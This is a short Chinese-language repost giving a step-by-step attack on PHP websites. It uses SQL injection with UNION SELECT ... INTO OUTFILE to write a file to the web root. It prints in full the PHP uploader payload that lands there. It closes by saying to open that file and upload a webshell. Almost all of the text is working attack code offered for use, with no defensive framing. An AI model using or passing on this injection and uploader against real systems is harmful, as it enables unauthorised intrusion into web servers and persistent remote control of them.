關于PHP網站報錯性注入拿shell的方法,定位到報錯在某個欄位上的利用方式:
條件1: 爆出了網站的物理路徑
條件2:MySQL具有into outfile權限
SQL陳述句為:
假如欄位為2:
union+select+1,payload的十六進制,3,4,5+into+outfile+'/var/www/html/data/1.php';
payload:
<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="https://www.cnblogs.com/hack404/p/Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>
訪問1.PHP上傳webshell即可,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/5373.html
標籤:訊息安全
上一篇:sql手工注入1